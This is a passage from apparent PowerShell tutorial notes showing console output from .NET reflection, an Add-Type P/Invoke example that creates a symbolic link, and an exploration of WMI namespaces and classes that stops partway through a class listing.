void _Type.GetTypeInfoCount([ref] uint32 pcTInfo) Invoke Method void _MemberInfo.Invoke(uint32 dispIdMember, [ref] guid riid, uint32 lcid, int16 wFlags, System.IntPtr pDispParams, System.IntPtr pVarResult, System.IntPtr p... InvokeMember Method System.Object InvokeMember(string name, System.Reflection.BindingFlags bindingFlags, System.Reflection.Binder binder, System.Object target, System.Object[] p... IsAssignableFrom Method bool IsAssignableFrom(System.Reflection.TypeInfo typeInfo), bool IsAssignableFrom(type c), bool _Type.IsAssignableFrom(type c) IsDefined Method bool IsDefined(type attributeType, bool inherit), bool ICustomAttributeProvider.IsDefined(type attributeType, bool inherit), bool _MemberInfo.IsDefined(type ... IsEnumDefined Method bool IsEnumDefined(System.Object value) IsEquivalentTo Method bool IsEquivalentTo(type other) IsInstanceOfType Method bool IsInstanceOfType(System.Object o), bool _Type.IsInstanceOfType(System.Object o) IsSubclassOf Method bool IsSubclassOf(type type), bool _Type.IsSubclassOf(type c) MakeArrayType Method type MakeArrayType(), type MakeArrayType(int rank) MakeByRefType Method type MakeByRefType() MakeGenericType Method type MakeGenericType(Params type[] instantiation) MakePointerType Method type MakePointerType() ToString Method string ToString(), string _MemberInfo.ToString(), string _Type.ToString() Assembly Property System.Reflection.Assembly Assembly {get;} AssemblyQualifiedName Property string AssemblyQualifiedName {get;} Attributes Property System.Reflection.TypeAttributes Attributes {get;} BaseType Property type BaseType {get;} ContainsGenericParameters Property bool ContainsGenericParameters {get;} CustomAttributes Property System.Collections.Generic.IEnumerable[System.Reflection.CustomAttributeData] CustomAttributes {get;} DeclaredConstructors Property System.Collections.Generic.IEnumerable[System.Reflection.ConstructorInfo] DeclaredConstructors {get;} DeclaredEvents Property System.Collections.Generic.IEnumerable[System.Reflection.EventInfo] DeclaredEvents {get;} DeclaredFields Property System.Collections.Generic.IEnumerable[System.Reflection.FieldInfo] DeclaredFields {get;} DeclaredMembers Property System.Collections.Generic.IEnumerable[System.Reflection.MemberInfo] DeclaredMembers {get;} DeclaredMethods Property System.Collections.Generic.IEnumerable[System.Reflection.MethodInfo] DeclaredMethods {get;} DeclaredNestedTypes Property System.Collections.Generic.IEnumerable[System.Reflection.TypeInfo] DeclaredNestedTypes {get;} DeclaredProperties Property System.Collections.Generic.IEnumerable[System.Reflection.PropertyInfo] DeclaredProperties {get;} DeclaringMethod Property System.Reflection.MethodBase DeclaringMethod {get;} DeclaringType Property type DeclaringType {get;} FullName Property string FullName {get;} GenericParameterAttributes Property System.Reflection.GenericParameterAttributes GenericParameterAttributes {get;} GenericParameterPosition Property int GenericParameterPosition {get;} GenericTypeArguments Property type[] GenericTypeArguments {get;} GenericTypeParameters Property type[] GenericTypeParameters {get;} GUID Property guid GUID {get;} HasElementType Property bool HasElementType {get;} ImplementedInterfaces Property System.Collections.Generic.IEnumerable[type] ImplementedInterfaces {get;} IsAbstract Property bool IsAbstract {get;} IsAnsiClass Property bool IsAnsiClass {get;} IsArray Property bool IsArray {get;} IsAutoClass Property bool IsAutoClass {get;} IsAutoLayout Property bool IsAutoLayout {get;} IsByRef Property bool IsByRef {get;} IsClass Property bool IsClass {get;} IsCOMObject Property bool IsCOMObject {get;} IsConstructedGenericType Property bool IsConstructedGenericType {get;} IsContextful Property bool IsContextful {get;} IsEnum Property bool IsEnum {get;} IsExplicitLayout Property bool IsExplicitLayout {get;} IsGenericParameter Property bool IsGenericParameter {get;} IsGenericType Property bool IsGenericType {get;} IsGenericTypeDefinition Property bool IsGenericTypeDefinition {get;} IsImport Property bool IsImport {get;} IsInterface Property bool IsInterface {get;} IsLayoutSequential Property bool IsLayoutSequential {get;} IsMarshalByRef Property bool IsMarshalByRef {get;} IsNested Property bool IsNested {get;} IsNestedAssembly Property bool IsNestedAssembly {get;} IsNestedFamANDAssem Property bool IsNestedFamANDAssem {get;} IsNestedFamily Property bool IsNestedFamily {get;} IsNestedFamORAssem Property bool IsNestedFamORAssem {get;} IsNestedPrivate Property bool IsNestedPrivate {get;} IsNestedPublic Property bool IsNestedPublic {get;} IsNotPublic Property bool IsNotPublic {get;} IsPointer Property bool IsPointer {get;} IsPrimitive Property bool IsPrimitive {get;} IsPublic Property bool IsPublic {get;} IsSealed Property bool IsSealed {get;} IsSecurityCritical Property bool IsSecurityCritical {get;} IsSecuritySafeCritical Property bool IsSecuritySafeCritical {get;} IsSecurityTransparent Property bool IsSecurityTransparent {get;} IsSerializable Property bool IsSerializable {get;} IsSpecialName Property bool IsSpecialName {get;} IsUnicodeClass Property bool IsUnicodeClass {get;} IsValueType Property bool IsValueType {get;} IsVisible Property bool IsVisible {get;} MemberType Property System.Reflection.MemberTypes MemberType {get;} MetadataToken Property int MetadataToken {get;} Module Property System.Reflection.Module Module {get;} Name Property string Name {get;} Namespace Property string Namespace {get;} ReflectedType Property type ReflectedType {get;} StructLayoutAttribute Property System.Runtime.InteropServices.StructLayoutAttribute StructLayoutAttribute {get;} TypeHandle Property System.RuntimeTypeHandle TypeHandle {get;} TypeInitializer Property System.Reflection.ConstructorInfo TypeInitializer {get;} UnderlyingSystemType Property type UnderlyingSystemType {get;} PS C:\Users\Administrator\Desktop> ``` ```PowerShell PS C:\Users\Administrator\Desktop> $obj | Get-Member -Static TypeName: SysCommands Name MemberType Definition ---- ---------- ---------- Equals Method static bool Equals(System.Object objA, System.Object objB) lookup Method static void lookup(string domainname) Main Method static void Main() ReferenceEquals Method static bool ReferenceEquals(System.Object objA, System.Object objB) PS C:\Users\Administrator\Desktop> ``` ```PowerShell PS C:\Users\Administrator\Desktop> $obj.GetMethods() | Where-Object {$_.Name -eq "netcmd"} Name : netcmd DeclaringType : SysCommands ReflectedType : SysCommands MemberType : Method MetadataToken : 100663298 Module : SysCommands.dll IsSecurityCritical : True IsSecuritySafeCritical : False IsSecurityTransparent : False MethodHandle : System.RuntimeMethodHandle Attributes : PrivateScope, Public, HideBySig CallingConvention : Standard, HasThis ReturnType : System.Void ReturnTypeCustomAttributes : Void ReturnParameter : Void IsGenericMethod : False IsGenericMethodDefinition : False ContainsGenericParameters : False MethodImplementationFlags : IL IsPublic : True IsPrivate : False IsFamily : False IsAssembly : False IsFamilyAndAssembly : False IsFamilyOrAssembly : False IsStatic : False IsFinal : False IsVirtual : False IsHideBySig : True IsAbstract : False IsSpecialName : False IsConstructor : False CustomAttributes : {} PS C:\Users\Administrator\Desktop> ``` ================================================ FILE: 31-Using-NET-in-Powershell-Part-5.md ================================================ #### 31. Using .NET in Powershell Part 5 ###### Add-Type - Use ```Add-Type``` with ```-MemberDefinition``` - Making ```Windows API calls``` - Get Signature (```pinvoke.net``` recommended) - Make the ```method declarations public``` - Use the modified signature in ```Add-Type -MemberDefinition``` - [Creating a Symbolic Link using PowerShell](https://learn-powershell.net/2013/07/16/creating-a-symbolic-link-using-powershell/) - [CreateSymbolicLink](http://pinvoke.net/default.aspx/kernel32/CreateSymbolicLink.html) - ```New-SymLink.ps1``` ```PowerShell $ApiCode = @" [DllImport("kernel32.dll")] public static extern bool CreateSymbolicLink(string lpSymlinkFileName, string lpTargetFileName, int dwFlags); "@ $SymLink = Add-Type -MemberDefinition $ApiCode -Name Symlink -Namespace CreatSymLink -PassThru $SymLink::CreateSymbolicLink('C:\test\link', 'C:\Users\', 1) ``` ```PowerShell PS C:\Users\Administrator\Desktop> .\New-SymLink.ps1 True PS C:\Users\Administrator\Desktop> ``` ![Image of API](images/7.jpeg) ================================================ FILE: 32-Using-WMI-in-Powershell-Part-1.md ================================================ #### 32. Using WMI in Powershell Part 1 ###### [WMI](http://searchwindowsserver.techtarget.com/definition/Windows-Management-Instrumentation) – Exploring - Get help on ```WMI``` ```PowerShell PS C:\Users\Administrator> Get-Help *wmi* Name Category Module Synopsis ---- -------- ------ -------- gwmi Alias Get-WmiObject iwmi Alias Invoke-WmiMethod rwmi Alias Remove-WmiObject swmi Alias Set-WmiInstance Get-WmiObject Cmdlet Microsoft.PowerShell.M... Gets instances of Windows Management Instrumentation (WMI) classes or information about the available classes. Invoke-WmiMethod Cmdlet Microsoft.PowerShell.M... Calls Windows Management Instrumentation (WMI) methods. Register-WmiEvent Cmdlet Microsoft.PowerShell.M... Subscribes to a Windows Management Instrumentation (WMI) event. Remove-WmiObject Cmdlet Microsoft.PowerShell.M... Deletes an instance of an existing Windows Management Instrumentation (WMI) class. Set-WmiInstance Cmdlet Microsoft.PowerShell.M... Creates or updates an instance of an existing Windows Management Instrumentation (WMI) class. about_WMI HelpFile Windows Management Instrumentation (WMI) uses the about_Wmi_Cmdlets HelpFile Provides background information about Windows Management Instrumentation PS C:\Users\Administrator> ``` - Exploring ```namespaces``` - ```Namespaces``` are collection of ```classes``` which hold ```objects``` of different types - [List even the nested namespaces](http://www.powershellmagazine.com/2013/10/18/pstip-list-all-wmi-namespaces-on-a-system/) ```PowerShell PS C:\Users\Administrator> Get-WmiObject -Namespace "root" -Class "__Namespace" | Select-Object Name Name ---- subscription DEFAULT MicrosoftDfs CIMV2 msdtc Cli nap MicrosoftActiveDirectory SECURITY RSOP MicrosoftDNS StandardCimv2 WMI AccessLogging directory Policy InventoryLogging Interop Hardware ServiceModel Microsoft PS C:\Users\Administrator> ``` - Exploring ```classes``` ```PowerShell PS C:\Users\Administrator> Get-WmiObject -Namespace "root/cimv2" -List NameSpace: ROOT\cimv2 Name Methods Properties ---- ------- ---------- CIM_Indication {} {CorrelatedIndications, IndicationFilterName, IndicationIdentifier, IndicationTime...} CIM_ClassIndication {} {ClassDefinition, CorrelatedIndications, IndicationFilterName, IndicationIdentifier...} CIM_ClassDeletion {} {ClassDefinition, CorrelatedIndications, IndicationFilterName, IndicationIdentifier...} CIM_ClassCreation {} {ClassDefinition, CorrelatedIndications, IndicationFilterName, IndicationIdentifier...} CIM_ClassModification {} {ClassDefinition, CorrelatedIndications, IndicationFilterName, IndicationIdentifier...} CIM_InstIndication {} {CorrelatedIndications, IndicationFilterName, IndicationIdentifier, IndicationTime...} CIM_InstCreation {} {CorrelatedIndications, IndicationFilterName, IndicationIdentifier, IndicationTime...} CIM_InstModification {} {CorrelatedIndications, IndicationFilterName, IndicationIdentifier, IndicationTime...} CIM_InstDeletion {} {CorrelatedIndications, IndicationFilterName, IndicationIdentifier, IndicationTime...} __NotifyStatus {} {StatusCode} __ExtendedStatus {} {Description, Operation, ParameterInfo, ProviderName...} Win32_PrivilegesStatus {} {Description, Operation, ParameterInfo, PrivilegesNotHeld...} Win32_JobObjectStatus {} {AdditionalDescription, Description, Operation, ParameterInfo...} CIM_Error {} {CIMStatusCode, CIMStatusCodeDescription, ErrorSource, ErrorSourceFormat...} MSFT_WmiError {} {CIMStatusCode, CIMStatusCodeDescription, error_Category, error_Code...} MSFT_ExtendedStatus {} {CIMStatusCode, CIMStatusCodeDescription, error_Category, error_Code...} __SecurityRelatedClass {} {} __Trustee {} {Domain, Name, SID, SidLength...} Win32_Trustee {} {Domain, Name, SID, SidLength...} __NTLMUser9X {} {Authority, Flags, Mask, Name...} __ACE {} {AccessMask, AceFlags, AceType, GuidInheritedObjectType...} Win32_ACE {} {AccessMask, AceFlags, AceType, GuidInheritedObjectType...} __SecurityDescriptor {} {ControlFlags, DACL, Group, Owner...} Win32_SecurityDescriptor {} {ControlFlags, DACL, Group, Owner...} __PARAMETERS {} {} __SystemClass {} {} __ProviderRegistration {} {provider} __EventProviderRegistration {} {EventQueryList, provider} __ObjectProviderRegistration {} {InteractionType, provider, QuerySupportLevels, SupportsBatching...} __ClassProviderRegistration {} {CacheRefreshInterval, InteractionType, PerUserSchema, provider...} __InstanceProviderRegistration {} {InteractionType, provider, QuerySupportLevels, SupportsBatching...} __MethodProviderRegistration {} {provider} __PropertyProviderRegistration {} {provider, SupportsGet, SupportsPut} __EventConsumerProviderRegistration {} {ConsumerClassNames, provider} __thisNAMESPACE {} {SECURITY_DESCRIPTOR} __NAMESPACE {} {Name} __IndicationRelated {} {} __FilterToConsumerBinding {} {Consumer, CreatorSID, DeliverSynchronously, DeliveryQoS...} __EventConsumer {} {CreatorSID, MachineName, MaximumQueueSize} __AggregateEvent {} {NumberOfEvents, Representative} __TimerNextFiring {} {NextEvent64BitTime, TimerId} __EventFilter {} {CreatorSID, EventAccess, EventNamespace, Name...} __Event {} {SECURITY_DESCRIPTOR, TIME_CREATED} __NamespaceOperationEvent {} {SECURITY_DESCRIPTOR, TargetNamespace, TIME_CREATED} __NamespaceModificationEvent {} {PreviousNamespace, SECURITY_DESCRIPTOR, TargetNamespace, TIME_CREATED} __NamespaceDeletionEvent {} {SECURITY_DESCRIPTOR, TargetNamespace, TIME_CREATED} __NamespaceCreationEvent {} {SECURITY_DESCRIPTOR, TargetNamespace, TIME_CREATED} __ClassOperationEvent {} {SECURITY_DESCRIPTOR, TargetClass, TIME_CREATED} __ClassDeletionEvent {} {SECURITY_DESCRIPTOR, TargetClass, TIME_CREATED} __ClassModificationEvent {} {PreviousClass, SECURITY_DESCRIPTOR, TargetClass, TIME_CREATED} __ClassCreationEvent {} {SECURITY_DESCRIPTOR, TargetClass, TIME_CREATED} __InstanceOperationEvent {} {SECURITY_DESCRIPTOR, TargetInstance, TIME_CREATED} __InstanceCreationEvent {} {SECURITY_DESCRIPTOR, TargetInstance, TIME_CREATED} __MethodInvocationEvent {} {Method, Parameters, PreCall, SECURITY_DESCRIPTOR...} __InstanceModificationEvent {} {PreviousInstance, SECURITY_DESCRIPTOR, TargetInstance, TIME_CREATED} __InstanceDeletionEvent {} {SECURITY_DESCRIPTOR, TargetInstance, TIME_CREATED} __TimerEvent {} {NumFirings, SECURITY_DESCRIPTOR, TIME_CREATED, TimerId} __ExtrinsicEvent {} {SECURITY_DESCRIPTOR, TIME_CREATED} __SystemEvent {} {SECURITY_DESCRIPTOR, TIME_CREATED} __EventDroppedEvent {} {Event, IntendedConsumer, SECURITY_DESCRIPTOR, TIME_CREATED} __EventQueueOverflowEvent {} {CurrentQueueSize, Event, IntendedConsumer, SECURITY_DESCRIPTOR...} __QOSFailureEvent {} {ErrorCode, ErrorDescription, Event, IntendedConsumer...} __ConsumerFailureEvent {} {ErrorCode, ErrorDescription, ErrorObject, Event...} MSFT_SCMEvent {} {SECURITY_DESCRIPTOR, TIME_CREATED} MSFT_SCMEventLogEvent {} {SECURITY_DESCRIPTOR, TIME_CREATED} MSFT_NetSevereServiceFailed {} {SECURITY_DESCRIPTOR, Service, TIME_CREATED} MSFT_NetTransactInvalid {} {SECURITY_DESCRIPTOR, TIME_CREATED} MSFT_NetServiceNotInteractive {} {SECURITY_DESCRIPTOR, Service, TIME_CREATED} MSFT_NetTakeOwnership {} {RegistryKey, SECURITY_DESCRIPTOR, TIME_CREATED} MSFT_NetServiceConfigBackoutFailed {} {ConfigField, SECURITY_DESCRIPTOR, Service, TIME_CREATED} MSFT_NetServiceShutdownFailed {} {SECURITY_DESCRIPTOR, Service, TIME_CREATED} MSFT_NetServiceStartHung {} {SECURITY_DESCRIPTOR, Service, TIME_CREATED} MSFT_NetServiceStopControlSuccess {} {Comment, Control, Reason, ReasonText...} MSFT_NetServiceSlowStartup {} {SECURITY_DESCRIPTOR, Service, StartupTime, TIME_CREATED} MSFT_NetCallToFunctionFailed {} {Error, FunctionName, SECURITY_DESCRIPTOR, TIME_CREATED} MSFT_NetBadAccount {} {SECURITY_DESCRIPTOR, TIME_CREATED} MSFT_NetBadServiceState {} {SECURITY_DESCRIPTOR, Service, State, TIME_CREATED} MSFT_NetConnectionTimeout {} {Milliseconds, SECURITY_DESCRIPTOR, Service, TIME_CREATED} MSFT_NetCircularDependencyAuto {} {SECURITY_DESCRIPTOR, TIME_CREATED} MSFT_NetServiceStartTypeChanged {} {NewStartType, OldStartType, SECURITY_DESCRIPTOR, Service...} MSFT_NetServiceLogonTypeNotGranted {} {Account, Error, SECURITY_DESCRIPTOR, Service...} MSFT_NetServiceStartFailedGroup {} {Group, SECURITY_DESCRIPTOR, Service, TIME_CREATED} MSFT_NetDependOnLaterService {} {SECURITY_DESCRIPTOR, Service, TIME_CREATED} MSFT_NetFirstLogonFailedII {} {Account, Error, SECURITY_DESCRIPTOR, Service...} MSFT_NetServiceDifferentPIDConne... {} {ActualPID, ExpectedPID, SECURITY_DESCRIPTOR, Service...} MSFT_NetServiceCrashNoAction {} {SECURITY_DESCRIPTOR, Service, TIME_CREATED, TimesFailed} MSFT_NetCircularDependencyDemand {} {SECURITY_DESCRIPTOR, Service, TIME_CREATED} MSFT_NetServiceExitFailed {} {Error, SECURITY_DESCRIPTOR, Service, TIME_CREATED} MSFT_NetServiceStartFailedII {} {DependedOnService, Error, SECURITY_DESCRIPTOR, Service...} MSFT_NetServiceExitFailedSpecific {} {Error, SECURITY_DESCRIPTOR, Service, TIME_CREATED} MSFT_NetBootSystemDriversFailed {} {DriverList, SECURITY_DESCRIPTOR, TIME_CREATED} MSFT_NetServiceCrash {} {Action, ActionDelay, ActionType, SECURITY_DESCRIPTOR...} MSFT_NetServiceRecoveryFailed {} {Action, ActionType, Error, SECURITY_DESCRIPTOR...} MSFT_NetServiceStatusSuccess {} {Control, SECURITY_DESCRIPTOR, Service, TIME_CREATED} MSFT_NetTransactTimeout {} {Milliseconds, SECURITY_DESCRIPTOR, Service, TIME_CREATED} MSFT_NetFirstLogonFailed {} {Error, SECURITY_DESCRIPTOR, TIME_CREATED} MSFT_NetServiceControlSuccess {} {Control, SECURITY_DESCRIPTOR, Service, sid...} MSFT_NetServiceStartFailed {} {Error, SECURITY_DESCRIPTOR, Service, TIME_CREATED} MSFT_NetServiceStartFailedNone {} {NonExistingService, SECURITY_DESCRIPTOR, Service, TIME_CREATED} MSFT_NetReadfileTimeout {} {Milliseconds, SECURITY_DESCRIPTOR, TIME_CREATED} MSFT_NetRevertedToLastKnownGood {} {SECURITY_DESCRIPTOR, TIME_CREATED} MSFT_NetCallToFunctionFailedII {} {Argument, Error, FunctionName, SECURITY_DESCRIPTOR...} MSFT_NetDependOnLaterGroup {} {SECURITY_DESCRIPTOR, Service, TIME_CREATED} MSFT_WmiSelfEvent {} {SECURITY_DESCRIPTOR, TIME_CREATED} MSFT_WmiEssEvent {} {SECURITY_DESCRIPTOR, TIME_CREATED} MSFT_WmiThreadPoolEvent {} {SECURITY_DESCRIPTOR, ThreadId, TIME_CREATED} MSFT_WmiThreadPoolThreadCreated {} {SECURITY_DESCRIPTOR, ThreadId, TIME_CREATED} MSFT_WmiThreadPoolThreadDeleted {} {SECURITY_DESCRIPTOR, ThreadId, TIME_CREATED} MSFT_WmiRegisterNotificationSink {} {Namespace, Query, QueryLanguage, SECURITY_DESCRIPTOR...} MSFT_WmiFilterEvent {} {Name, Namespace, Query, QueryLanguage...} MSFT_WmiFilterDeactivated {} {Name, Namespace, Query, QueryLanguage...} MSFT_WmiFilterActivated {} {Name, Namespace, Query, QueryLanguage...} MSFT_WmiCancelNotificationSink {} {Namespace, Query, QueryLanguage, SECURITY_DESCRIPTOR...} MSFT_WmiProviderEvent {} {Namespace, ProviderName, SECURITY_DESCRIPTOR, TIME_CREATED} MSFT_WmiConsumerProviderEvent {} {Machine, Namespace, ProviderName, SECURITY_DESCRIPTOR...} MSFT_WmiConsumerProviderSinkLoaded {} {Consumer, Machine, Namespace, ProviderName...} MSFT_WmiConsumerProviderSinkUnlo... {} {Consumer, Machine, Namespace, ProviderName...} MSFT_WmiConsumerProviderUnloaded {} {Machine, Namespace, ProviderName, SECURITY_DESCRIPTOR...} MSFT_WmiConsumerProviderLoaded {} {Machine, Namespace, ProviderName, SECURITY_DESCRIPTOR...} Msft_WmiProvider_OperationEvent {} {HostingGroup, HostingSpecification, Locale, Namespace...} Msft_WmiProvider_ComServerLoadOp... {} {Clsid, HostingGroup, HostingSpecification, InProcServer...} Msft_WmiProvider_OperationEvent_... {} {HostingGroup, HostingSpecification, Locale, Namespace...} Msft_WmiProvider_PutInstanceAsyn... {} {Flags, HostingGroup, HostingSpecification, InstanceObject...} Msft_WmiProvider_CreateInstanceE... {} {ClassName, Flags, HostingGroup, HostingSpecification...} Msft_WmiProvider_DeleteInstanceA... {} {Flags, HostingGroup, HostingSpecification, Locale...} Msft_WmiProvider_CancelQuery_Post {} {HostingGroup, HostingSpecification, Locale, Namespace...} Msft_WmiProvider_NewQuery_Post {} {HostingGroup, HostingSpecification, Locale, Namespace...} Msft_WmiProvider_ProvideEvents_Post {} {Flags, HostingGroup, HostingSpecification, Locale...} Msft_WmiProvider_ExecQueryAsyncE... {} {Flags, HostingGroup, HostingSpecification, Locale...} Msft_WmiProvider_AccessCheck_Post {} {HostingGroup, HostingSpecification, Locale, Namespace...} Msft_WmiProvider_CreateClassEnum... {} {Flags, HostingGroup, HostingSpecification, Locale...} Msft_WmiProvider_DeleteClassAsyn... {} {ClassName, Flags, HostingGroup, HostingSpecification...} Msft_WmiProvider_ExecMethodAsync... {} {Flags, HostingGroup, HostingSpecification, InputParameters...} Msft_WmiProvider_GetObjectAsyncE... {} {Flags, HostingGroup, HostingSpecification, Locale...} Msft_WmiProvider_PutClassAsyncEv... {} {ClassObject, Flags, HostingGroup, HostingSpecification...} Msft_WmiProvider_InitializationO... {} {HostingGroup, HostingSpecification, Locale, Namespace...} Msft_WmiProvider_InitializationO... {} {HostingGroup, HostingSpecification, Locale, Namespace...} Msft_WmiProvider_LoadOperationFa... {} {Clsid, HostingGroup, HostingSpecification, InProcServer...} Msft_WmiProvider_ComServerLoadOp... {} {Clsid, HostingGroup, HostingSpecification, InProcServer...} Msft_WmiProvider_UnLoadOperation... {} {HostingGroup, HostingSpecification, Locale, Namespace...} Msft_WmiProvider_LoadOperationEvent {} {Clsid, HostingGroup, HostingSpecification, InProcServer...} Msft_WmiProvider_OperationEvent_Pre {} {HostingGroup, HostingSpecification, Locale, Namespace...} Msft_WmiProvider_DeleteInstanceA... {} {Flags, HostingGroup, HostingSpecification, Locale...} Msft_WmiProvider_AccessCheck_Pre {} {HostingGroup, HostingSpecification, Locale, Namespace...} Msft_WmiProvider_ExecQueryAsyncE... {} {Flags, HostingGroup, HostingSpecification, Locale...} Msft_WmiProvider_DeleteClassAsyn... {} {ClassName, Flags, HostingGroup, HostingSpecification...} Msft_WmiProvider_NewQuery_Pre {} {HostingGroup, HostingSpecification, Locale, Namespace...} Msft_WmiProvider_PutInstanceAsyn... {} {Flags, HostingGroup, HostingSpecification, InstanceObject...} Msft_WmiProvider_CreateClassEnum... {} {Flags, HostingGroup, HostingSpecification, Locale...} Msft_WmiProvider_ExecMethodAsync... {} {Flags, HostingGroup, HostingSpecification, InputParameters...} Msft_WmiProvider_ProvideEvents_Pre {} {Flags, HostingGroup, HostingSpecification, Locale...} Msft_WmiProvider_CancelQuery_Pre {} {HostingGroup, HostingSpecification, Locale, Namespace...} Msft_WmiProvider_PutClassAsyncEv... {} {ClassObject, Flags, HostingGroup, HostingSpecification...} Msft_WmiProvider_GetObjectAsyncE... {} {Flags, HostingGroup, HostingSpecification, Locale...} Msft_WmiProvider_CreateInstanceE... {} {ClassName, Flags, HostingGroup, HostingSpecification...} MSFT_WMI_GenericNonCOMEvent {} {ProcessId, PropertyNames, PropertyValues, ProviderName...} Win32_ComputerSystemEvent {} {MachineName, SECURITY_DESCRIPTOR, TIME_CREATED} Win32_ComputerShutdownEvent {} {MachineName, SECURITY_DESCRIPTOR, TIME_CREATED, Type} Win32_IP4RouteTableEvent {} {SECURITY_DESCRIPTOR, TIME_CREATED} MSFT_NCProvEvent {} {Namespace, ProviderName, Result, SECURITY_DESCRIPTOR...} MSFT_NCProvCancelQuery {} {ID, Namespace, ProviderName, Result...} MSFT_NCProvClientConnected {} {Inproc, Namespace, ProviderName, Result...} MSFT_NCProvNewQuery {} {ID, Namespace, ProviderName, Query...} MSFT_NCProvAccessCheck {} {Namespace, ProviderName, Query, QueryLanguage...} RegistryEvent {} {SECURITY_DESCRIPTOR, TIME_CREATED} RegistryKeyChangeEvent {} {Hive, KeyPath, SECURITY_DESCRIPTOR, TIME_CREATED} RegistryTreeChangeEvent {} {Hive, RootPath, SECURITY_DESCRIPTOR, TIME_CREATED} RegistryValueChangeEvent {} {Hive, KeyPath, SECURITY_DESCRIPTOR, TIME_CREATED...} Win32_SystemTrace {} {SECURITY_DESCRIPTOR, TIME_CREATED} Win32_ProcessTrace {} {ParentProcessID, ProcessID, ProcessName, SECURITY_DESCRIPTOR...} Win32_ProcessStartTrace {} {ParentProcessID, ProcessID, ProcessName, SECURITY_DESCRIPTOR...} Win32_ProcessStopTrace {} {ExitStatus, ParentProcessID, ProcessID, ProcessName...} Win32_ModuleTrace {} {SECURITY_DESCRIPTOR, TIME_CREATED} Win32_ModuleLoadTrace {} {DefaultBase, FileName, ImageBase, ImageChecksum...} Win32_ThreadTrace {} {ProcessID, SECURITY_DESCRIPTOR, ThreadID, TIME_CREATED} Win32_ThreadStartTrace {} {ProcessID, SECURITY_DESCRIPTOR, StackBase, StackLimit...} Win32_ThreadStopTrace {} {ProcessID, SECURITY_DESCRIPTOR, ThreadID, TIME_CREATED} Win32_PowerManagementEvent {} {EventType, OEMEventCode, SECURITY_DESCRIPTOR, TIME_CREATED} Win32_DeviceChangeEvent {} {EventType, SECURITY_DESCRIPTOR, TIME_CREATED} Win32_SystemConfigurationChangeE... {} {EventType, SECURITY_DESCRIPTOR, TIME_CREATED} Win32_VolumeChangeEvent {} {DriveName, EventType, SECURITY_DESCRIPTOR, TIME_CREATED} __EventGenerator {} {} __TimerInstruction {} {SkipIfPassed, TimerId} __AbsoluteTimerInstruction {} {EventDateTime, SkipIfPassed, TimerId} __IntervalTimerInstruction {} {IntervalBetweenEvents, SkipIfPassed, TimerId} __Provider {} {Name} __Win32Provider {} {ClientLoadableCLSID, CLSID, Concurrency, DefaultMachineName...} __SystemSecurity {GetSD, GetSecuri... {} Win32_CollectionStatistics {} {Collection, Stats} Win32_NamedJobObjectStatistics {} {Collection, Stats} Win32_NTLogEvent {} {Category, CategoryString, ComputerName, Data...} CIM_Configuration {} {Caption, Description, Name} CIM_LogicalIdentity {} {SameElement, SystemElement} Win32_ActiveRoute {} {SameElement, SystemElement} Win32_AccountSID {} {Element, Setting} CIM_Location {} {Address, Name, PhysicalPosition} CIM_DependencyContext {} {Context, Dependency} Win32_SecurityDescriptorHelper {Win32SDToSDDL, W... {} CIM_Setting {} {Caption, Description, SettingID} Win32_TimeZone {} {Bias, Caption, DaylightBias, DaylightDay...} Win32_PageFileSetting {} {Caption, Description, InitialSize, MaximumSize...} Win32_Desktop {} {BorderWidth, Caption, CoolSwitch, CursorBlinkRate...} Win32_ShadowContext {} {Caption, ClientAccessible, Description, Differential...} Win32_MSIResource {} {Caption, Description, SettingID} Win32_ServiceControl {} {Arguments, Caption, Description, Event...} Win32_Property {} {Caption, Description, ProductCode, Property...} Win32_Patch {} {Attributes, Caption, Description, File...} Win32_PatchPackage {} {Caption, Description, PatchID, ProductCode...} Win32_Binary {} {Caption, Data, Description, Name...} Win32_AutochkSetting {} {Caption, Description, SettingID, UserInputDelay} Win32_SerialPortConfiguration {} {AbortReadWriteOnError, BaudRate, BinaryModeEnabled, BitsPerByte...} CIM_MonitorResolution {} {Caption, Description, HorizontalResolution, MaxRefreshRate...} Win32_StartupCommand {} {Caption, Command, Description, Location...} Win32_BootConfiguration {} {BootDirectory, Caption, ConfigurationPath, Description...} Win32_NetworkLoginProfile {} {AccountExpires, AuthorizationFlags, BadPasswordCount, Caption...} Win32_NamedJobObjectLimitSetting {} {ActiveProcessLimit, Affinity, Caption, Description...} CIM_VideoControllerResolution {} {Caption, Description, HorizontalResolution, MaxRefreshRate...} Win32_NamedJobObjectSecLimitSetting {} {Caption, Description, PrivilegesToDelete, RestrictedSIDs...} Win32_DisplayConfiguration {} {BitsPerPel, Caption, Description, DeviceName...} Win32_NetworkAdapterConfiguration {EnableDHCP, Rene... {ArpAlwaysSourceRoute, ArpUseEtherSNAP, Caption, DatabasePath...} Win32_QuotaSetting {} {Caption, DefaultLimit, DefaultWarningLimit, Description...} Win32_SecuritySetting {GetSecurityDescr... {Caption, ControlFlags, Description, SettingID} Win32_LogicalFileSecuritySetting {GetSecurityDescr... {Caption, ControlFlags, Description, OwnerPermissions...} Win32_LogicalShareSecuritySetting {GetSecurityDescr... {Caption, ControlFlags, Description, Name...} Win32_DisplayControllerConfigura... {} {BitsPerPixel, Caption, ColorPlanes, Description...} Win32_WMISetting {} {ASPScriptDefaultNamespace, ASPScriptEnabled, AutorecoverMofs, AutoStartWin9X...} Win32_OSRecoveryConfiguration {} {AutoReboot, Caption, DebugFilePath, DebugInfoType...} Win32_COMSetting {} {Caption, Description, SettingID} Win32_ClassicCOMClassSetting {} {AppID, AutoConvertToClsid, AutoTreatAsClsid, Caption...} Win32_DCOMApplicationSetting {GetLaunchSecurit... {AppID, AuthenticationLevel, Caption, CustomSurrogate...} Win32_VideoConfiguration {} {ActualColorResolution, AdapterChipType, AdapterCompatibility, AdapterDACType...} Win32_ODBCAttribute {} {Attribute, Caption, Description, Driver...} Win32_ODBCSourceAttribute {} {Attribute, Caption, DataSource, Description...} ScriptingStandardConsumerSetting {} {Caption, Description, MaximumScripts, SettingID...} Win32_PrinterConfiguration {} {BitsPerPel, Caption, Collate, Color...} Win32_CurrentTime {} {Day, DayOfWeek, Hour, Milliseconds...} Win32_UTCTime {} {Day, DayOfWeek, Hour, Milliseconds...} Win32_LocalTime {} {Day, DayOfWeek, Hour, Milliseconds...} CIM_FRU {} {Caption, Description, FRUNumber, IdentifyingNumber...} CIM_Action {Invoke} {ActionID, Caption, Description, Direction...} Win32_ShortcutAction {Invoke} {ActionID, Arguments, Caption, Description...} CIM_RebootAction {Invoke} {ActionID, Caption, Description, Direction...} Win32_ExtensionInfoAction {Invoke} {ActionID, Argument, Caption, Command...} CIM_DirectoryAction 